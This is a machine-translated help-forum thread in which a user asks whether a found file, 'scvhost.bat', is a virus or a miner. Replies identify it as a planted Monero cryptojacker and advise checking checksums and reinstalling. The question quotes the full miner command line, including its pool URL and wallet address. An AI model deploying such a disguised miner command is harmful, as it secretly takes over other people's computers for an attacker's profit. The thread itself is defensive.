Это scvhost.bat с cryptonight вирус или майнер?

3925
NewbieProgrammer

Я только что нашел этот .bat файл с именем scvhost.bat. Файл содержал это содержание:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Это вирус (для кражи информации и т. Д.) Или засеянный майнер? Я волнуюсь, поскольку я также балуюсь криптовалютами, и stratumэто валюта, которая упоминается в приведенном выше файле.

17
Это действительно кажется шахтером. Учитывая, что вы используете криптовалюты самостоятельно, если вы тоже мои, убедитесь, что это на самом деле не является частью того, что вы используете для майнинга. Вы можете сделать это, переименовав расширение .bat во что-то другое и посмотреть, сможете ли вы по-прежнему нормально работать после перезагрузки. Одна вещь, которую я нахожу странной в этом файле, это то, что обычно он будет называть себя, учитывая, что scvhost - это и имя того, что он выполняет, и файл bat. Обычно это приводит к циклу. LPChip 6 лет назад 1
@LPChip scvhost - системный процесс Windows, поэтому файл bat вызывает scvhost для запуска cryptonight.exe в качестве фоновой службы. Virtual Anomaly 6 лет назад 0
@VirtualAnomaly Я думаю, что вы ошиблись sVChost с sCVhost, упомянутым здесь. Да, я очень хорошо понимаю, что svchost - это механизм для хостинга. LPChip 6 лет назад 2
Спасибо, ребята, за ваш ответ! Я не моя, но у меня есть пара монет. Я узнал, что это действительно монетный монетизатор Monero, установленный в моей системе. Неудивительно, что мой компьютер стал чертовски медленным. У меня есть адрес кошелька и я говорю, что владелец добыл 8+ монет Монеро, это около 3k: / NewbieProgrammer 6 лет назад 0
@LPChip Мои извинения, вы правы, я ошибся. Virtual Anomaly 6 лет назад 2
Я думаю, кто-то слишком много играл в Starcraft. CodesInChaos 6 лет назад 2
@CodesInChaos Известна ли проблема со Starcraft или почему? (Я, очевидно, не понимаю) lucidbrot 6 лет назад 0
@lucidbrot SCV - это единица «строителя» одной из гонок (терранов) игры, в этом случае это означает «Space Construction Vehicle». Aaron 6 лет назад 1

1 ответ на вопрос

34
mtak

Похоже, это какой-то майнер, тем более что параметр содержит URL-адрес пула майнинга. Тем не менее, вы должны быть уверены, что в двоичном файле. Имеет смысл сравнить контрольные суммы найденного вами бинарного файла вашей системы с выпусками, сделанными командой разработчиков майнера. Если они отличаются; считаю вашу систему небезопасной.

Другая проблема заключается в том, что вы узнали об этом майнере (возможно, потому, что он использовал много процессора), но вы не представляете, что еще произошло в вашей системе. Если злоумышленник может запустить майнер, он мог бы запустить и другие вещи. Это может быть хорошей идеей для восстановления из резервной копии или в любом случае выполнить новую установку.

Похожие вопросы